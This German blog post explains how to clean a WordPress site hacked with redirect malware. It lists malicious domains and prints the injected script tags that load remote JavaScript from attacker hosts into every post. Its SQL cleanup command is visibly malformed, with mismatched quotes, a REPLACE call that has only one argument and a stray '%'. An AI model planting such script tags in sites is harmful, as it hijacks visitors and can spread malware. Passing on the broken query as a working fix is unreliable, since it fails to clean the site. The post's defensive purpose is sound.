Dein WordPress-Blog wurde gehackt, wenn du dein Blog aufrufst und unfreiwillig auf eine andere Seite weitergeleitet wirst. Malware von folgenden URLs ist momentan sehr häufig zu beobachten (Stand Mai 2020):

  • dest.collectfasttracks.com
  • stat.trackstatisticsss.com
  • ws.stivenfernando.com
  • gotosecond2.com
  • makesomethird3.com
  • wiilberedmodels.com
  • bullgoesdown.com
  • forwardmytraffic.com
  • dns.createrelativechanging.com
  • greatinstagrampage.com
  • gabriellalovecats.com
  • jackielovedogs.com
  • tomorrowwillbehotmaybe.com
  • activeandbanflip.com
  • developsincelock.com
  • blueeyeswebsite.com
So sah es bei mir aus

So behebst du die gehackte Umleitung in WordPress

In deinen Blog-Beiträgen findest du am Ende des Beitrags solch ähnlich aussehende Code-Schnipsel:

<script src="https://hotopponents.site/site.js" type="text/javascript"</script> <script src="https://saskmade.net/head.js?ver=2.0.0" type="text/javascript"></script> <script async="" src="https://dest.collectfasttracks.com/hjsers.js" type="text/javascript"></script>

Wenn du auf einen dieser Code triffst, sind in der Regel alle deine Beiträge mit Malware infiziert. Tipp: Wenn du sehr viele Beiträge hast, kannst du die Malware mit einfacher SQL-Abfrage entfernen. Erstelle bitte vorher ein Datenbank-Backup. Öffne phpMyAdmin, füge diesen SQL-Befehl ein:

UPDATE wp_posts SET post_content = REPLACE(post_content, "<script async="" src="https://dest.collectfasttracks.com/hjsers.js" type="text/javascript"></script>%';

und ersetze vor dem Absenden (!), den rot markierten Codeschnipsel mit dem entsprechenden Schnipsel aus deinem Beitrag. Danach sind alle WordPress-Artikel von der Malware befreit.

Kategorie:

Wordpress,